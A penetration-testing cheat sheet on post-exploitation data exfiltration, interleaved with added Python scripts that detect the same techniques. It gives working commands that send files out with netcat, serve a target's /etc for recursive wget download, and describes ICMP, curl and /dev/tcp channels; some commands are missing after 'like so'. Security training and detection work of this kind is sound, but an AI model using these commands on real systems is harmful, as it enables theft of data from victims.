Data Exfiltration Post Exploitation
Personal discoveries added but majorly derived from: https://raw.githubusercontent.com/RackunSec/Penetration-Testing-Grimoire/master/Post%20Exploitation/data-exfiltration-infiltration.md
Using netcat
On the receiving end, running
nc -l -p 1234 > out.file
will begin listening on port 1234.
On the sending end, running
nc -w 3 [destination] 1234 < out.file
will connect to the receiver and begin sending the file.
Python HTTP Server
With Python 3:
python3 -m http.server 5432
If Python (2.x) is installed on the target system, you can simply start SimpleHTTPServer with the following command in whatever directory you wish to share temporarily.
www-data@target-system:/etc# python -m SimpleHTTPServer 5432
This will instantly share the files on the target system in /etc (the directory the service was started in) via HTTP on port 5432. You can then use wget recursively from the attacker machine to pull all files found, like so,
root@attacker-system:~/ctf/target/# wget -r http://(TARGET IP ADDRESS):5432
SCP (SSH)
If SSH is installed on the target system, we can simply use scp to exfiltrate data from the target server onto our attacker machine. First, we need to ensure that SSH is running on the attacker machine to accept the connection and file from the target. Then, we can use the following syntax to transfer the file,
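From the defender's side, the netcat and SimpleHTTPServer listeners above are easy to spot on the host because they are owned by a throwaway process rather than a service. The following Python script is an added example, not part of the original notes: it parses constructed `ss -tlnp` output (sample text, not a live capture) and reports every listening socket whose port or owning process is not in an assumed per-host baseline. The baseline, the list of ad-hoc server binaries and the sample PIDs are assumptions for the illustration.

```python
"""Host-side check for ad-hoc listeners (nc -l, python http.server) on a server.
The ss(8) output below is constructed sample text, not a live capture."""
import re

# One `ss -tlnp` line per listening socket; the `users:` column names the owning
# process and its PID.
SS_RE = re.compile(
    r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+"
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)

# Constructed sample: sshd and nginx are expected; the python and nc sockets are
# the kind of temporary share described in the text.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       511     127.0.0.1:80         0.0.0.0:*          users:(("nginx",pid=900,fd=6))
LISTEN  0       5       0.0.0.0:5432         0.0.0.0:*          users:(("python",pid=4021,fd=3))
LISTEN  0       1       0.0.0.0:1234         0.0.0.0:*          users:(("nc",pid=4033,fd=3))
LISTEN  0       128     [::]:22              [::]:*             users:(("sshd",pid=812,fd=4))
"""

# Assumed baseline for this host: which process may own which port.
BASELINE = {22: {"sshd"}, 80: {"nginx"}}
# Binaries routinely used as throwaway file servers or relays (assumed list).
ADHOC_SERVERS = {"nc", "ncat", "netcat", "python", "python2", "python3", "php", "ruby"}


def parse_ss(text):
    """Yield one dict per LISTEN line; header and malformed lines are skipped."""
    for line in text.splitlines():
        m = SS_RE.match(line)
        if m:
            sock = m.groupdict()
            sock["port"] = int(sock["port"])
            sock["pid"] = int(sock["pid"])
            yield sock


def audit_listeners(text=SAMPLE_SS):
    """Return (port, process, pid, reason) for every listener outside the baseline."""
    findings = []
    for sock in parse_ss(text):
        allowed = BASELINE.get(sock["port"])
        if allowed is None:
            reason = "port not in baseline"
        elif sock["proc"] not in allowed:
            reason = f"port {sock['port']} owned by {sock['proc']}, expected {sorted(allowed)}"
        else:
            continue  # expected service on its expected port
        if sock["proc"] in ADHOC_SERVERS:
            reason += "; ad-hoc server binary"
        findings.append((sock["port"], sock["proc"], sock["pid"], reason))
    return findings


if __name__ == "__main__":
    for port, proc, pid, reason in audit_listeners():
        print(f"port {port} ({proc}, pid {pid}): {reason}")
```

The check keys on the owning process, not only the port: the example share above happens to use 5432, the PostgreSQL port, which a port-only allowlist on a database host would wave through even though it is served by a bare python process.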
HTTP Logs
If command injection is possible on the target server, but it's not possible to save files anywhere to create a shell (super-unprivileged user), we can use curl in combination with interpolated command output to make an HTTP request to our local HTTP server on the attacker system, like so,
Then, in our local HTTP logs, we will see the output of $(whoami) as the username GET request parameter.
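On the victim side the same request lines appear in egress proxy or web server logs, which is where a defender catches both tricks described above: command output smuggled into a query string, and a recursive wget pull of a temporary share. The following Python script is an added example, not code from the original notes. It runs two checks over constructed combined-format log lines (the sample addresses, timestamps and user agents are invented): it decodes each query parameter and flags values that look like command output, and it flags clients that issue a burst of GETs with a bulk-download user agent. The marker list and thresholds are assumptions to tune per environment.

```python
"""Detect two exfiltration patterns in HTTP access logs (constructed sample data):
  1. command output smuggled into query-string parameters (curl + $(cmd) trick),
  2. recursive mirroring of a temporary web share (wget -r).
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Combined log format as written by Apache/nginx (assumed; python's http.server
# logs a shorter line, but the client address and request line are the same).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Substrings that appear in command output (id, /etc/passwd, uname -a) but not in
# ordinary parameter values; assumed starting list.
OUTPUT_MARKERS = ("uid=", "gid=", "root:x:", "Linux ", "/bin/bash", "/bin/sh")

# Constructed sample log: curl requests carrying command output, one ordinary
# browser request, then a wget -r mirror of a shared directory.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /?username=www-data HTTP/1.1" 200 612 "-" "curl/7.88.1"
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /?id=uid%3D33%28www-data%29%20gid%3D33%28www-data%29 HTTP/1.1" 200 612 "-" "curl/7.88.1"
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /search?q=laptop HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:55:41 +0000] "GET /?u=root%3Ax%3A0%3A0%3Aroot%3A%2Froot%3A%2Fbin%2Fbash HTTP/1.1" 200 612 "-" "curl/7.88.1"
10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET / HTTP/1.1" 200 1200 "-" "Wget/1.21.3"
10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /passwd HTTP/1.1" 200 2000 "-" "Wget/1.21.3"
10.0.0.7 - - [10/Oct/2023:13:56:02 +0000] "GET /shadow HTTP/1.1" 403 150 "-" "Wget/1.21.3"
10.0.0.7 - - [10/Oct/2023:13:56:02 +0000] "GET /hosts HTTP/1.1" 200 300 "-" "Wget/1.21.3"
10.0.0.7 - - [10/Oct/2023:13:56:03 +0000] "GET /ssh/sshd_config HTTP/1.1" 200 3000 "-" "Wget/1.21.3"
"""


def parse_log(text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
            yield rec


def suspicious_params(target):
    """Return (name, decoded value) pairs whose value looks like command output."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl already percent-decodes, so '%28www-data%29' is '(www-data)'
        if any(marker in value for marker in OUTPUT_MARKERS) or re.search(r"[()\s]", value):
            hits.append((name, value))
    return hits


def mirror_bursts(records, window_seconds=10, min_requests=5):
    """Map client IP -> request count for clients that issued at least
    min_requests GETs within window_seconds using a bulk-download client."""
    by_ip = defaultdict(list)
    for r in records:
        if r["method"] == "GET" and r["ua"].startswith(("Wget/", "curl/")):
            by_ip[r["ip"]].append(r["ts"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        for i in range(len(times) - min_requests + 1):
            if (times[i + min_requests - 1] - times[i]).total_seconds() <= window_seconds:
                flagged[ip] = len(times)
                break
    return flagged


def analyze(text=SAMPLE_LOG):
    records = list(parse_log(text))
    smuggled = [(r["ip"], r["ua"], hit) for r in records for hit in suspicious_params(r["target"])]
    return {"smuggled": smuggled, "mirrors": mirror_bursts(records)}


if __name__ == "__main__":
    result = analyze()
    for ip, ua, (name, value) in result["smuggled"]:
        print(f"command output in parameter {name!r} from {ip} ({ua}): {value}")
    for ip, n in result["mirrors"].items():
        print(f"bulk mirror from {ip}: {n} requests")
```

Note what the content check cannot see: a bare `$(whoami)` result such as `www-data` is indistinguishable from a legitimate parameter value, so that line is only caught by correlating the client (a web server making outbound curl requests) rather than by the value itself.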
Using Ping for Data Exfiltration
To use Ping, we will use the -c argument and specify 16 bytes to pad the ICMP request. First, we will break the file up into 16 byte chunks using xxd like so,
Then, we start Wireshark on the attacker machine and listen for ICMP, using the icmp LibPCAP filter. Now, we simply use these 16 byte chunks to pad the ICMP requests to the attacker machine. We can script this like so,
In Wireshark, the hexadecimal bytes will be translated into ASCII. This can be cleaned up by using tcpdump on the attacker machine and parsing the ASCII/string output.
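The same capture is what an analyst works from after the fact: echo requests whose padding is neither the Linux nor the Windows default are the signal, and the bodies reassembled in icmp_seq order give back whatever was sent. The Python script below is an added example, not code from the original notes. It takes ICMP echo-request payloads already extracted from a capture (for instance from `tcpdump -X` output), classifies each as default padding, text-like custom padding or opaque binary padding, and rebuilds the text-like bodies. Every packet in it is constructed, including the fake timestamp bytes and the /etc/passwd line used as the smuggled content.

```python
"""Triage ICMP echo-request payloads from a capture and recover text carried in
custom padding. All packets below are constructed, not from a real capture."""
import string

# Default data iputils ping sends after its 8-byte timeval: 0x10, 0x11, 0x12, ...
LINUX_SEQ = bytes(range(0x10, 0x10 + 48))
# Default 32-byte data sent by Windows ping.exe.
WINDOWS_PAD = b"abcdefghijklmnopqrstuvwabcdefghi"
PRINTABLE = frozenset(string.printable.encode())


def body_of(payload):
    """iputils stores a timeval in the first 8 data bytes when the data is >= 16 bytes."""
    return payload[8:] if len(payload) >= 16 else payload


def classify(payload):
    """Label one echo-request data section."""
    if payload == WINDOWS_PAD:
        return "windows-default"
    body = body_of(payload)
    if body and body == LINUX_SEQ[:len(body)]:
        return "linux-default"
    if body and sum(b in PRINTABLE for b in body) / len(body) >= 0.9:
        return "custom-text"
    return "custom-binary"


def recover_text(packets):
    """Concatenate the text-like bodies in icmp_seq order, which is how an analyst
    rebuilds a file that was sent as many small pings."""
    pieces = [(seq, body_of(p)) for seq, p in packets if classify(p) == "custom-text"]
    return b"".join(body for _, body in sorted(pieces))


def summarize(packets):
    """Count packets per classification, e.g. {'linux-default': 1, 'custom-text': 4}."""
    counts = {}
    for _, p in packets:
        label = classify(p)
        counts[label] = counts.get(label, 0) + 1
    return counts


# Constructed capture as (icmp_seq, data) pairs: two benign pings, four 16-byte
# pings each carrying 8 bytes of a passwd line, and one ping with binary padding.
TS = bytes.fromhex("6525 1a3c 000c 5e10")  # constructed timeval, not a real timestamp
SECRET = b"root:x:0:0:root:/root:/bin/bash\n"
SAMPLE_PACKETS = [(1, TS + LINUX_SEQ), (2, WINDOWS_PAD)]
SAMPLE_PACKETS += [(10 + i, TS + SECRET[8 * i:8 * i + 8]) for i in range(len(SECRET) // 8)]
SAMPLE_PACKETS.append((20, TS + bytes.fromhex("deadbeef") * 2))

if __name__ == "__main__":
    print(summarize(SAMPLE_PACKETS))
    print(recover_text(SAMPLE_PACKETS).decode())
```

The classification is deliberately loose: a tool that encodes the file before padding it will land in the custom-binary bucket rather than custom-text, which is still a finding, since normal ping clients never send anything but the two default patterns.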
Data Infiltration
FTP
You can use FTP for data infiltration on any OS if you happen to find it installed on a target machine. Check out /Post Exploitation/ftp.md for more information on how to infiltrate data and binaries to a target system using FTP.
/dev/tcp/
Bash's /dev/tcp/ pseudo-device allows us to interact with TCP sockets. First, we simply start a listener on our attacker machine and feed it a file, like so,
Then, we simply cat the /dev/tcp/ file descriptor for our attacker socket (ip:port) and redirect the output directly into a file or tee as so,
Notice the format, /dev/tcp/ then the attacker IP address, and port separated by forward slashes as though it were a simple file.
Powershell.exe
If we have compromised a system and are in a reverse Powershell, we can infiltrate data to the system using the following Powershell commands,
PS 3.0+ has wget and can be called like so,